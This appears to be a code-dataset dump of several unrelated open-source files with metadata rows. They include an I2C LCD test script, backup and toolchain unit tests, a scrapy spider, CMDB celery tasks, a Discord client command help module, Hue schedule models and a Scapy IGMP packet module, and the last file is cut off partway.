| -2,414,864,582,742,854,000 | 41.076923 | 149 | 0.676417 | false |
bobrathbone/piradio
|
test_i2c_lcd.py
|
1
|
1971
|
#!/usr/bin/env python
#
# LCD driver program using the lcd_i2c_class.py
# $Id: test_i2c_lcd.py,v 1.8 2016/12/03 13:44:51 bob Exp $
# Adapted from RpiLcdBackpack from Paul Knox-Kennedy
# at Adafruit Industries
#
# Author : Bob Rathbone
# Site : http://www.bobrathbone.com
#
# License: GNU V3, See https://www.gnu.org/copyleft/gpl.html
#
# Disclaimer: Software is provided as is and absolutly no warranties are implied or given.
# The authors shall not be liable for any loss or damage however caused.
#
import sys
from lcd_i2c_class import lcd_i2c
from lcd_i2c_pcf8574 import lcd_i2c_pcf8574
from time import sleep
def no_interrupt():
return False
if __name__ == '__main__':
i2c_address = 0x00
print "I2C LCD test program"
print "1 = Adafruit I2C backpack"
print "2 = PCF8574 I2C backpack"
response = raw_input("Select type of backpack: ")
if int(response) is 1:
lcd = lcd_i2c()
i2c_address = 0x20
elif int(response) is 2:
lcd = lcd_i2c_pcf8574()
i2c_address = 0x27
else:
print "Invalid selection!"
sys.exit(1)
print "I2C address:", hex(i2c_address)
try:
if int(response) is 2:
lcd.init(address=i2c_address)
else:
lcd.init()
except:
print "Could not initialise LCD, check selection!"
sys.exit(1)
# Set width
width = 16
print "\nSet LCD width"
print "1 = Width 16"
print "2 = Width 20"
response = raw_input("Select LCD width: ")
if int(response) is 2:
width = 20
print "Width", width
print "Starting test"
lcd.setWidth(width)
lcd.backlight(True)
lcd.blink(False)
lcd.cursor(False)
lcd.clear()
lcd.line1("Bob Rathbone")
lcd.line2("Hello World!")
lcd.blink(True)
sleep(3)
lcd.blink(False)
lcd.line3("Line 3 1923456789012")
lcd.line4("!@#$%^&*(_[]\/?<>:?+")
lcd.scroll2("Bob Rathbone ABCDEFGHIJKLMNOPQRSTUVWXYZ", no_interrupt)
sleep(3)
lcd.line1("Finished test!")
lcd.line2("")
lcd.line3("")
lcd.line4("")
sleep(1)
lcd.backlight(False)
sleep(1)
lcd.backlight(True)
print "Test finished"
|
gpl-3.0
| 1,879,905,245,515,275,000 | 21.146067 | 90 | 0.686961 | false |
SciLifeLab/TACA
|
tests/test_backup.py
|
1
|
7917
|
#!/usr/bin/env python
import unittest
import mock
import tempfile
import os
import shutil
from taca.backup import backup
from taca.utils import config as conf
CONFIG = conf.load_yaml_config('data/taca_test_cfg_backup.yaml')
class TestRunVars(unittest.TestCase):
"""Tests for TACA Backup variables class."""
def test_backup_variables(self):
"""Set up backup variables."""
run_variables = backup.run_vars('data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX')
self.assertEqual(run_variables.name, '190201_A00621_0032_BHHFCFDSXX')
self.assertEqual(run_variables.zip, '190201_A00621_0032_BHHFCFDSXX.tar.gz')
self.assertEqual(run_variables.key, '190201_A00621_0032_BHHFCFDSXX.key')
self.assertEqual(run_variables.key_encrypted, '190201_A00621_0032_BHHFCFDSXX.key.gpg')
self.assertEqual(run_variables.zip_encrypted, '190201_A00621_0032_BHHFCFDSXX.tar.gz.gpg')
class TestBackupUtils(unittest.TestCase):
"""Tests for TACA Backup utils class."""
def test_fetch_config_info(self):
"""Get backup info from config."""
config_info = backup.backup_utils('data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX')
self.assertEqual(config_info.data_dirs, {'miseq': 'data/nas/miseq.lab'})
self.assertEqual(config_info.archive_dirs, {'hiseq': 'blah', 'miseq': 'data/nas/miseq.lab/nosync'})
self.assertEqual(config_info.keys_path, 'data/nas/run_keys')
self.assertEqual(config_info.gpg_receiver, 'some.user')
self.assertEqual(config_info.mail_recipients, 'some_user@some_email.com')
self.assertEqual(config_info.check_demux, True)
self.assertEqual(config_info.couch_info, {'url': 'url', 'username': 'username', 'password': 'pwd', 'port': 1234, 'xten_db': 'x_flowcells'})
def test_collect_runs(self):
"""Get backup runs from archive directories."""
backup_object = backup.backup_utils()
backup_object.collect_runs(ext='.tar.gz', filter_by_ext=True)
run = backup_object.runs[0].name
self.assertEqual(run, '200201_A00621_0032_BHHFCFDSXY')
def test_collect_runs_specific_run(self):
"""Collect only specific run."""
backup_object = backup.backup_utils(run='data/nas/miseq.lab/nosync/200201_A00621_0032_BHHFCFDSXX')
backup_object.collect_runs()
run = backup_object.runs[0].name
self.assertEqual(run, '200201_A00621_0032_BHHFCFDSXX')
missing_object = backup.backup_utils(run='some/missing/path/run')
with self.assertRaises(SystemExit):
missing_object.collect_runs()
@mock.patch('taca.backup.backup.sp.Popen.communicate')
@mock.patch('taca.backup.backup.misc')
def test_avail_disk_space(self, mock_misc, mock_sp):
"""Check backup disk space."""
backup_object = backup.backup_utils()
mock_sp.return_value = ['Filesystem 512-blocks Used Available Capacity iused ifree %iused Mounted on\n/dev/disk1s1 976490576 100 813074776 15% 1086272 4881366608 0% /System/Volumes/Data', None]
path = 'data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX'
run = '190201_A00621_0032_BHHFCFDSXX'
with self.assertRaises(SystemExit):
backup_object.avail_disk_space(path, run)
@mock.patch('taca.backup.backup.sp.check_call')
def test_file_in_pdc(self, mock_call):
"""Check if files exist in PDC."""
mock_call.return_value = 'Whatever'
backup_object = backup.backup_utils()
src_file = 'data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX/RTAComplete.txt'
self.assertTrue(backup_object.file_in_pdc(src_file, silent=True))
def test_get_run_type(self):
"""Get run types from flowcell names."""
backup_object = backup.backup_utils()
novaseq_run = backup_object._get_run_type('190201_A00621_0032_BHHFCFDSXX')
self.assertEqual(novaseq_run, 'novaseq')
hiseqx_run = backup_object._get_run_type('190711_ST-E00266_0356_AH2L32CCX2')
self.assertEqual(hiseqx_run, 'hiseqx')
miseq_run = backup_object._get_run_type('200604_M01320_0329_000000000-J668J')
self.assertEqual(miseq_run, 'miseq')
hiseq_run = backup_object._get_run_type('190628_D00415_0465_BH2HVYBCX3')
self.assertEqual(hiseq_run, 'hiseq')
nextseq_run = backup_object._get_run_type('200602_NS500688_0656_AHGCKWBGXF')
self.assertEqual(nextseq_run, 'nextseq')
def test_call_commands(self):
"""Call expernal backup command."""
backup_object = backup.backup_utils()
got_output = backup_object._call_commands(cmd1='ls data/nas/miseq.lab', mail_failed=False, return_out=True)
expected_output = (True, b'190201_A00621_0032_BHHFCFDSXX\nnosync\n')
self.assertEqual(got_output, expected_output)
def test_call_commands_double(self):
"""Call external backup command, given two commands."""
backup_object = backup.backup_utils()
tmp_dir = os.path.join(tempfile.mkdtemp(), 'tmp')
tmp_file = os.path.join(tmp_dir, 'output.out')
os.makedirs(tmp_dir)
cmd1 = 'ls data/nas/miseq.lab'
cmd2 = 'ls data/nas/miseq.lab'
got_output = backup_object._call_commands(cmd1, cmd2, out_file=tmp_file, mail_failed=False)
self.assertTrue(os.path.isfile(tmp_file))
shutil.rmtree(tmp_dir)
def test_check_status(self):
"""Check subprocess status."""
backup_object = backup.backup_utils()
cmd = 'ls'
status_pass = 0
err_msg = 'Error'
got_status_pass = backup_object._check_status(cmd, status_pass, err_msg, mail_failed=False)
self.assertTrue(got_status_pass)
status_fail = 1
got_status_fail = backup_object._check_status(cmd, status_fail, err_msg, mail_failed=False)
self.assertFalse(got_status_fail)
@mock.patch('taca.backup.backup.os.remove')
def test_clean_tmp_files(self, mock_remove):
"""Remove file if it exist."""
backup_object = backup.backup_utils()
files = ['data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX/RTAComplete.txt', 'data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX/missing_file.txt']
backup_object._clean_tmp_files(files)
mock_remove.assert_called_once_with('data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX/RTAComplete.txt')
@mock.patch('taca.backup.backup.statusdb', autospec=True)
@mock.patch('taca.backup.backup.logger')
def test_log_pdc_statusdb(self, mock_logger, mock_couch):
"""Update statusdb if transfer was successful."""
backup_object = backup.backup_utils()
run = '190201_A00621_0032_BHHFCFDSXX'
backup_object._log_pdc_statusdb(run)
mock_logger.warn.assert_called_once()
@mock.patch('taca.backup.backup.backup_utils._call_commands', return_value=True)
@mock.patch('taca.backup.backup.shutil')
@mock.patch('taca.backup.backup.backup_utils._clean_tmp_files')
@mock.patch('taca.backup.backup.backup_utils.avail_disk_space')
def test_encrypt_runs(self, mock_space, mock_clean, mock_shutil, mock_command):
"""Encrypt found runs."""
backup_object = backup.backup_utils(run='data/nas/miseq.lab/nosync/200201_A00621_0032_BHHFCFDSXX')
run = 'data/nas/miseq.lab/nosync/190201_A00621_0032_BHHFCFDSXX'
force = True
backup_object.encrypt_runs(run, force)
mock_clean.assert_called_once()
os.remove('data/nas/miseq.lab/nosync/190201_A00621_0032_BHHFCFDSXX.encrypting')
@mock.patch('taca.backup.backup.logger.error')
def test_pdc_put(self, mock_logger):
"""Put runs on PDC."""
backup_object = backup.backup_utils(run='data/nas/miseq.lab/nosync/200201_A00621_0032_BHHFCFDSXX')
run = 'data/nas/miseq.lab/nosync/190201_A00621_0032_BHHFCFDSXX'
backup_object.pdc_put(run)
mock_logger.assert_called_once()
|
mit
| 8,632,255,092,867,096,000 | 48.792453 | 223 | 0.671593 | false |
moonlet/fuli
|
src/fuli_spiders/fuli_spiders/spiders/fulidang.py
|
1
|
1727
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from scrapy import Request
from scrapy.selector import Selector
from base import BaseSpider
class FuLiDang(BaseSpider):
name = 'fulidang'
ch_name = u'福利档'
start_urls = ['http://www.fulidang.com/page/1']
white_list = set([u'求出处', u'美图集', u'门事件', u'番号档', u'艺人档',
u'Rosi', u'Disi', u'Tuigirl', u'Ru1mm'])
def parse(self, response):
selector = Selector(response=response)
articles = selector.xpath('/html/body/section/div/div[@class="content"]/article')
for item in articles:
try:
title = item.xpath('header/h2/a/text()').extract()[0]
# link URL
url = item.xpath('header/h2/a/@href').extract()[0]
description = item.xpath('span/text()').extract()[0]
description = self._join_text(description)
# image URL
img = item.xpath('div/a/img/@src').extract()[0]
# YYYY-MM-DD
date = item.xpath('p/span[1]/text()').extract()[0]
date = self._parse_date(date)
# label of category
category = item.xpath('header/a/text()').extract()[0]
if category not in self.__class__.white_list:
continue
self.save(title=title, url=url, description=description,
img=img, date=date, category=category)
except IndexError:
continue
url_prefix, cur_page = response.url.rsplit("/", 1)
next_page = url_prefix + "/" + str(int(cur_page) + 1)
yield Request(next_page, self.parse)
|
mit
| 5,604,872,685,534,299,000 | 39.261905 | 89 | 0.532821 | false |
pycook/cmdb
|
cmdb-api/api/tasks/cmdb.py
|
1
|
3045
|
# -*- coding:utf-8 -*-
import json
import time
from flask import current_app
import api.lib.cmdb.ci
from api.extensions import celery
from api.extensions import db
from api.extensions import es
from api.extensions import rd
from api.lib.cmdb.cache import CITypeAttributesCache
from api.lib.cmdb.const import CMDB_QUEUE
from api.lib.cmdb.const import REDIS_PREFIX_CI
from api.lib.cmdb.const import REDIS_PREFIX_CI_RELATION
from api.models.cmdb import CIRelation
@celery.task(name="cmdb.ci_cache", queue=CMDB_QUEUE)
def ci_cache(ci_id):
time.sleep(0.01)
db.session.close()
m = api.lib.cmdb.ci.CIManager()
ci = m.get_ci_by_id_from_db(ci_id, need_children=False, use_master=False)
if current_app.config.get("USE_ES"):
es.create_or_update(ci_id, ci)
else:
rd.create_or_update({ci_id: json.dumps(ci)}, REDIS_PREFIX_CI)
current_app.logger.info("{0} flush..........".format(ci_id))
@celery.task(name="cmdb.ci_delete", queue=CMDB_QUEUE)
def ci_delete(ci_id):
current_app.logger.info(ci_id)
if current_app.config.get("USE_ES"):
es.delete(ci_id)
else:
rd.delete(ci_id, REDIS_PREFIX_CI)
current_app.logger.info("{0} delete..........".format(ci_id))
@celery.task(name="cmdb.ci_relation_cache", queue=CMDB_QUEUE)
def ci_relation_cache(parent_id, child_id):
db.session.close()
children = rd.get([parent_id], REDIS_PREFIX_CI_RELATION)[0]
children = json.loads(children) if children is not None else {}
cr = CIRelation.get_by(first_ci_id=parent_id, second_ci_id=child_id, first=True, to_dict=False)
if str(child_id) not in children:
children[str(child_id)] = cr.second_ci.type_id
rd.create_or_update({parent_id: json.dumps(children)}, REDIS_PREFIX_CI_RELATION)
current_app.logger.info("ADD ci relation cache: {0} -> {1}".format(parent_id, child_id))
@celery.task(name="cmdb.ci_relation_delete", queue=CMDB_QUEUE)
def ci_relation_delete(parent_id, child_id):
children = rd.get([parent_id], REDIS_PREFIX_CI_RELATION)[0]
children = json.loads(children) if children is not None else {}
if str(child_id) in children:
children.pop(str(child_id))
rd.create_or_update({parent_id: json.dumps(children)}, REDIS_PREFIX_CI_RELATION)
current_app.logger.info("DELETE ci relation cache: {0} -> {1}".format(parent_id, child_id))
@celery.task(name="cmdb.ci_type_attribute_order_rebuild", queue=CMDB_QUEUE)
def ci_type_attribute_order_rebuild(type_id):
current_app.logger.info('rebuild attribute order')
db.session.remove()
from api.lib.cmdb.ci_type import CITypeAttributeGroupManager
attrs = CITypeAttributesCache.get(type_id)
id2attr = {attr.attr_id: attr for attr in attrs}
res = CITypeAttributeGroupManager.get_by_type_id(type_id, True)
order = 0
for group in res:
for _attr in group.get('attributes'):
if order != id2attr.get(_attr['id']) and id2attr.get(_attr['id']):
id2attr.get(_attr['id']).update(order=order)
order += 1
|
gpl-2.0
| -6,562,198,830,761,991,000 | 31.393617 | 99 | 0.681117 | false |
TntMatthew/dcli
|
commandhelp.py
|
1
|
6437
|
from colors import ansicolors, colorize
import themes
theme = themes.get_default_theme()
def get_command_help(command):
if command == 'help':
return colorize('/help [command]:\n', ansi=theme['command-header']) + \
colorize('Shows help about a given command. If [command] is ommitted, a list' + \
' of available commands it shown instead.', ansi=theme['command-output'])
elif command == 'quit':
return colorize('/quit:\n', ansi=theme['command-header']) + \
colorize('Quits the client. Nothing else to say here.', ansi=theme['command-output'])
elif command == 'shrug':
return colorize('/shrug [message]:\n', ansi=theme['command-header']) + \
colorize('Sends a message with ¯\_(ツ)_/¯ appended.', ansi=theme['command-output'])
elif command == 'tableflip':
return colorize('/tableflip [message]:\n', ansi=theme['command-header']) + \
colorize('Sends a message with (╯°□°)╯︵ ┻━┻ appended.', ansi=theme['command-output'])
elif command == 'unflip':
return colorize('/unflip [message]:\n', ansi=theme['command-header']) + \
colorize('Sends a message with (╯°□°)╯︵ ┻━┻ appended.', ansi=theme['command-output'])
elif command == 'away':
return colorize('/away [message]:\n', ansi=theme['command-header']) + \
colorize('Sets your status to idle and tells Discord that you\'re going AFK. ' +
'The benefits of using this over /status idle is that this will allow you ' +
'to receive push notifications on your phone while you\'re away.\n' +
'You can set an optional message that will appear in your now playing text ' +
'prefixed by "[away]". Using this command again without specifying a message ' +
'will un-away you and restore your previous status.',
ansi=theme['command-output'])
elif command == 'status':
return colorize('/status [online|idle|dnd|invisible] [game]:\n', ansi=theme['command-header']) + \
colorize('Sets your status and current game. This will automatically de-away you.',
ansi=theme['command-output'])
elif command == 'replace':
return colorize('/replace [find-term] [replace-term]:\n',
ansi=ansicolors.lightcyantheme['command-header']) + \
colorize('Edits the last message you by running a find and replace operation.',
ansi=theme['command-output'])
elif command == 'delete':
return colorize('/delete [last|user [name]]:\n', ansi=theme['command-header']) + \
colorize('Deletes a message with the given target.\n' +
'\nlast: Deletes the last message sent in the channel.\n' +
'user [name]: Deletes the last message sent in the channel by the given user.\n' +
'\nIf no target is provided, the last message you sent is deleted.',
ansi=theme['command-output'])
elif command == 'pin':
return colorize('/pin [last|mention|user [name]]:\n', ansi=theme['command-header']) + \
colorize('Pins a message with the given target.\n' +
'\nlast: Pins the last message sent in the channel.\n' +
'mention: Pins the last message that mentioned you.\n' +
'user [name]: Pins the last message sent in the channel by the given user.\n' +
'\nIf no target is provided, the last message you sent is pinned.',
ansi=theme['command-output'])
elif command == 'whois':
return colorize('/whois [name]:\n', ansi=theme['command-header']) + \
colorize('Shows the status, user ID, avatar URL, account creation and server join dates, ' +
'and if applicable, roles and nicknames of a member. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'sinfo':
return colorize('/sinfo:\n', ansi=theme['command-header']) + \
colorize('Shows the server ID, region, icon URL (if applicable), creation date, ' +
'owner, and member count for the current server. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'nick':
return colorize('/nick [name]:\n', ansi=theme['command-header']) + \
colorize('Sets your server specific nickname. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'msg':
return colorize('/query [name]:\n', ansi=theme['command-header']) + \
colorize('Creates a private channel to talk to the given user privately.\n' +
'If a private channel for this user is already open, you are switched to' +
'that channel instead. Cannot be used in DMs.', ansi=theme['command-output'])
elif command == 'kick':
return colorize('/kick [name]:\n', ansi=theme['command-header']) + \
colorize('Kicks the given user from the server. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'ban':
return colorize('/ban [delete-message-days] [name]:\n', ansi=theme['command-header']) + \
colorize('Bans the given user from the server. [delete-message-days] is an integer from ' +
'0 to 7 that specifies how many days back this user\'s messages are deleted. ' +
'Cannot be used in DMs.', ansi=theme['command-output'])
elif command == 'unban':
return colorize('/unban [name]:\n', ansi=theme['command-header']) + \
colorize('Unbans the given user from the server. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'set':
return colorize('/set [key] [value(s)]:\n', ansi=theme['command-header']) + \
colorize('Sets a configuration value for the client.', ansi=theme['command-output'])
elif command == 'names':
return colorize('/names:\n', ansi=theme['command-header']) + \
colorize('Lists the users who can access the current channel.', ansi=theme['command-output'])
else:
return '* Unknown command. Send /help for a list of available commands.'
|
mit
| -835,253,984,065,784,300 | 66.336842 | 106 | 0.588557 | false |
adamcharnock/python-hue-client
|
hueclient/models/schedules.py
|
1
|
1513
|
from repose.managers import Manager
from repose.resources import Resource
from hueclient import fields
from booby import validators as v
from hueclient.decoders import IndexedByIdDecoder
from hueclient.monitor import MonitorMixin
class ScheduleManager(Manager):
def get_decoders(self):
return self.decoders + [IndexedByIdDecoder()]
class Command(MonitorMixin, Resource):
#: The address to call (without protocol or domain). Eg:
#: ``/api/<username>/groups/0/action``
address = fields.String(v.Required())
#: The body of the request
body = fields.Dictionary()
#: The HTTP request method
method = fields.String(v.In(['GET', 'PUT', 'POST', 'DELETE']))
class Schedule(MonitorMixin, Resource):
#: The name of the schedule.
name = fields.String(v.Required())
#: Description of the schedule
description = fields.String()
#: Command to execute when the scheduled event occurs
command = fields.Embedded(Command)
#: Local time when the scheduled event will occur
local_time = fields.TimePattern(name='localtime')
#: Status, either 'enabled' or 'disabled'
status = fields.String(v.In(['enabled', 'disabled']))
#: If set to true, the schedule will be removed automatically if expired,
#: if set to false it will be disabled. Default is true.
auto_delete = fields.Boolean(name='autodelete')
#: UTC time that the timer was started. Only provided for timers.
start_time = fields.IsoDate(name='starttime', read_only=True)
|
mit
| -3,247,702,893,598,160,400 | 36.825 | 77 | 0.709187 | false |
CodeNameGhost/shiva
|
thirdparty/scapy/contrib/igmp.py
|
1
|
6990
|
#! /usr/bin/env python
# This file is part of Scapy
# Scapy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# any later version.
#
# Scapy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Scapy. If not, see <http://www.gnu.org/licenses/>.
# scapy.contrib.description = IGMP/IGMPv2
# scapy.contrib.status = loads
# TODO: scapy 2 has function getmacbyip, maybe it can replace igmpize
# at least from the MAC layer
from __future__ import print_function
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import *
#--------------------------------------------------------------------------
def isValidMCAddr(ip):
"""convert dotted quad string to long and check the first octet"""
FirstOct=atol(ip)>>24 & 0xFF
return (FirstOct >= 224) and (FirstOct <= 239)
#--------------------------------------------------------------------------
class IGMP(Packet):
"""IGMP Message Class for v1 and v2.
This class is derived from class Packet. You need to "igmpize"
the IP and Ethernet layers before a full packet is sent.
a=Ether(src="00:01:02:03:04:05")
b=IP(src="1.2.3.4")
c=IGMP(type=0x12, gaddr="224.2.3.4")
c.igmpize(b, a)
print "Joining IP " + c.gaddr + " MAC " + a.dst
sendp(a/b/c, iface="en0")
Parameters:
type IGMP type field, 0x11, 0x12, 0x16 or 0x17
mrtime Maximum Response time (zero for v1)
gaddr Multicast Group Address 224.x.x.x/4
See RFC2236, Section 2. Introduction for definitions of proper
IGMPv2 message format http://www.faqs.org/rfcs/rfc2236.html
"""
name = "IGMP"
igmptypes = { 0x11 : "Group Membership Query",
0x12 : "Version 1 - Membership Report",
0x16 : "Version 2 - Membership Report",
0x17 : "Leave Group"}
fields_desc = [ ByteEnumField("type", 0x11, igmptypes),
ByteField("mrtime",20),
XShortField("chksum", None),
IPField("gaddr", "0.0.0.0")]
#--------------------------------------------------------------------------
def post_build(self, p, pay):
"""Called implicitly before a packet is sent to compute and place IGMP checksum.
Parameters:
self The instantiation of an IGMP class
p The IGMP message in hex in network byte order
pay Additional payload for the IGMP message
"""
p += pay
if self.chksum is None:
ck = checksum(p)
p = p[:2]+chr(ck>>8)+chr(ck&0xff)+p[4:]
return p
#--------------------------------------------------------------------------
def mysummary(self):
"""Display a summary of the IGMP object."""
if isinstance(self.underlayer, IP):
return self.underlayer.sprintf("IGMP: %IP.src% > %IP.dst% %IGMP.type% %IGMP.gaddr%")
else:
return self.sprintf("IGMP %IGMP.type% %IGMP.gaddr%")
#--------------------------------------------------------------------------
def igmpize(self, ip=None, ether=None):
"""Called to explicitly fixup associated IP and Ethernet headers
Parameters:
self The instantiation of an IGMP class.
ip The instantiation of the associated IP class.
ether The instantiation of the associated Ethernet.
Returns:
True The tuple ether/ip/self passed all check and represents
a proper IGMP packet.
False One of more validation checks failed and no fields
were adjusted.
The function will examine the IGMP message to assure proper format.
Corrections will be attempted if possible. The IP header is then properly
adjusted to ensure correct formatting and assignment. The Ethernet header
is then adjusted to the proper IGMP packet format.
"""
# The rules are:
# 1. the Max Response time is meaningful only in Membership Queries and should be zero
# otherwise (RFC 2236, section 2.2)
if (self.type != 0x11): #rule 1
self.mrtime = 0
if (self.adjust_ip(ip) == True):
if (self.adjust_ether(ip, ether) == True): return True
return False
#--------------------------------------------------------------------------
def adjust_ether (self, ip=None, ether=None):
"""Called to explicitly fixup an associated Ethernet header
The function adjusts the ethernet header destination MAC address based on
the destination IP address.
"""
# The rules are:
# 1. send to the group mac address address corresponding to the IP.dst
if ip != None and ip.haslayer(IP) and ether != None and ether.haslayer(Ether):
iplong = atol(ip.dst)
ether.dst = "01:00:5e:%02x:%02x:%02x" % ( (iplong>>16)&0x7F, (iplong>>8)&0xFF, (iplong)&0xFF )
# print "igmpize ip " + ip.dst + " as mac " + ether.dst
return True
else:
return False
#--------------------------------------------------------------------------
def adjust_ip (self, ip=None):
"""Called to explicitly fixup an associated IP header
The function adjusts the IP header based on conformance rules
and the group address encoded in the IGMP message.
The rules are:
1. Send General Group Query to 224.0.0.1 (all systems)
2. Send Leave Group to 224.0.0.2 (all routers)
3a.Otherwise send the packet to the group address
3b.Send reports/joins to the group address
4. ttl = 1 (RFC 2236, section 2)
5. send the packet with the router alert IP option (RFC 2236, section 2)
"""
if ip != None and ip.haslayer(IP):
if (self.type == 0x11):
if (self.gaddr == "0.0.0.0"):
ip.dst = "224.0.0.1" # IP rule 1
retCode = True
elif isValidMCAddr(self.gaddr):
ip.dst = self.gaddr # IP rule 3a
retCode = True
else:
print("Warning: Using invalid Group Address")
retCode = False
elif ((self.type == 0x17) and isValidMCAddr(self.gaddr)):
ip.dst = "224.0.0.2" # IP rule 2
retCode = True
elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(self.gaddr)):
ip.dst = self.gaddr # IP rule 3b
retCode = True
else:
print("Warning: Using invalid IGMP Type")
retCode = False
else:
print("Warning: No IGMP Group Address set")
retCode = False
if retCode == True:
ip.ttl=1 # IP Rule 4
ip.options=[IPOption_Router_Alert()] # IP rule 5
return retCode
bind_layers( IP, IGMP, frag=0, proto=2)
|
mit
| 1,799,519,684,913,267,700 | 36.180851 | 100 | 0.580973 | false |
endlessm/chromium-browser
|
third_party/chromite/lib/toolchain_util_unittest.py
|
1
|
87756
|
# -*- coding: utf-8 -*-
# Copyright 2019 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for toolchain_util."""
from __future__ import print_function
import base64
import collections
import datetime
import glob
import io
import json
import os
import re
import shutil
import sys
import time
import mock
from six.moves import builtins
from chromite.lib import chroot_lib
from chromite.lib import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import git
from chromite.lib import gob_util
from chromite.lib import gs
from chromite.lib import gs_unittest
from chromite.lib import osutils
from chromite.lib import partial_mock
from chromite.lib import portage_util
from chromite.lib import timeout_util
from chromite.lib import toolchain_util
# pylint: disable=protected-access
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
_input_artifact = collections.namedtuple('_input_artifact',
['name', 'gs_locations'])
class ProfilesNameHelperTest(cros_test_lib.MockTempDirTestCase):
"""Test the helper functions related to naming."""
# pylint: disable=protected-access
def testParseBenchmarkProfileName(self):
"""Test top-level function _ParseBenchmarkProfileName."""
# Test parse failure
profile_name_to_fail = 'this_is_an_invalid_name'
with self.assertRaises(toolchain_util.ProfilesNameHelperError) as context:
toolchain_util._ParseBenchmarkProfileName(profile_name_to_fail)
self.assertIn('Unparseable benchmark profile name:', str(context.exception))
# Test parse success
profile_name = 'chromeos-chrome-amd64-77.0.3849.0_rc-r1.afdo'
result = toolchain_util._ParseBenchmarkProfileName(profile_name)
self.assertEqual(
result,
toolchain_util.BenchmarkProfileVersion(
major=77, minor=0, build=3849, patch=0, revision=1,
is_merged=False))
def testParseCWPProfileName(self):
"""Test top-level function _ParseCWPProfileName."""
# Test parse failure
profile_name_to_fail = 'this_is_an_invalid_name'
with self.assertRaises(toolchain_util.ProfilesNameHelperError) as context:
toolchain_util._ParseCWPProfileName(profile_name_to_fail)
self.assertIn('Unparseable CWP profile name:', str(context.exception))
# Test parse success
profile_name = 'R77-3809.38-1562580965.afdo.xz'
result = toolchain_util._ParseCWPProfileName(profile_name)
self.assertEqual(
result,
toolchain_util.CWPProfileVersion(
major=77, build=3809, patch=38, clock=1562580965))
def testParseMergedProfileName(self):
"""Test top-level function _ParseMergedProfileName."""
# Test parse failure
profile_name_to_fail = 'this_is_an_invalid_name'
with self.assertRaises(toolchain_util.ProfilesNameHelperError) as context:
toolchain_util._ParseMergedProfileName(profile_name_to_fail)
self.assertIn('Unparseable merged AFDO name:', str(context.exception))
# Test parse orderfile success
orderfile_name = ('chromeos-chrome-orderfile-field-77-3809.38-1562580965'
'-benchmark-77.0.3849.0-r1.orderfile.xz')
result = toolchain_util._ParseMergedProfileName(orderfile_name)
self.assertEqual(
result, (toolchain_util.BenchmarkProfileVersion(
major=77, minor=0, build=3849, patch=0, revision=1,
is_merged=False),
toolchain_util.CWPProfileVersion(
major=77, build=3809, patch=38, clock=1562580965)))
# Test parse release AFDO success
afdo_name = ('chromeos-chrome-amd64-airmont-77-3809.38-1562580965'
'-benchmark-77.0.3849.0-r1-redacted.afdo.xz')
result = toolchain_util._ParseMergedProfileName(afdo_name)
self.assertEqual(
result, (toolchain_util.BenchmarkProfileVersion(
major=77, minor=0, build=3849, patch=0, revision=1,
is_merged=False),
toolchain_util.CWPProfileVersion(
major=77, build=3809, patch=38, clock=1562580965)))
def testGetArtifactVersionInEbuild(self):
"""Test top-level function _GetArtifactVersionInEbuild."""
package = 'package'
ebuild_file = os.path.join(self.tempdir, 'package.ebuild')
variables = ['variable_name', 'another_variable_name']
values = ['old-afdo-artifact-1.0', 'another-old-afdo-artifact-1.0']
ebuild_file_content = '\n'.join([
'Some message before',
'%s="%s"' % (variables[0], values[0]),
'%s="%s"' % (variables[1], values[1]), 'Some message after'
])
osutils.WriteFile(ebuild_file, ebuild_file_content)
self.PatchObject(
toolchain_util, '_FindEbuildPath', return_value=ebuild_file)
for n, v in zip(variables, values):
ret = toolchain_util._GetArtifactVersionInEbuild(package, n)
self.assertEqual(ret, v)
def testGetOrderfileName(self):
"""Test method _GetOrderfileName and related methods."""
profile_name = ('chromeos-chrome-amd64-silvermont-77-3809.38-1562580965-'
'benchmark-77.0.3849.0-r1-redacted.afdo.xz')
self.PatchObject(
toolchain_util,
'_GetArtifactVersionInChromium',
return_value=profile_name)
result = toolchain_util._GetOrderfileName('/path/to/chrome_root')
cwp_name = 'field-77-3809.38-1562580965'
benchmark_name = 'benchmark-77.0.3849.0-r1'
self.assertEqual(
result, 'chromeos-chrome-orderfile-%s-%s' % (cwp_name, benchmark_name))
def testCompressAFDOFiles(self):
"""Test _CompressAFDOFiles()."""
input_dir = '/path/to/inputs'
output_dir = '/another/path/to/outputs'
targets = ['input1', '/path/to/inputs/input2']
suffix = '.xz'
self.PatchObject(cros_build_lib, 'CompressFile')
# Should raise exception because the input doesn't exist
with self.assertRaises(RuntimeError) as context:
toolchain_util._CompressAFDOFiles(targets, input_dir, output_dir, suffix)
self.assertEqual(
str(context.exception), 'file %s to compress does not exist' %
os.path.join(input_dir, targets[0]))
# Should pass
self.PatchObject(os.path, 'exists', return_value=True)
toolchain_util._CompressAFDOFiles(targets, input_dir, output_dir, suffix)
compressed_names = [os.path.basename(x) for x in targets]
inputs = [os.path.join(input_dir, n) for n in compressed_names]
outputs = [os.path.join(output_dir, n + suffix) for n in compressed_names]
calls = [mock.call(n, o) for n, o in zip(inputs, outputs)]
cros_build_lib.CompressFile.assert_has_calls(calls)
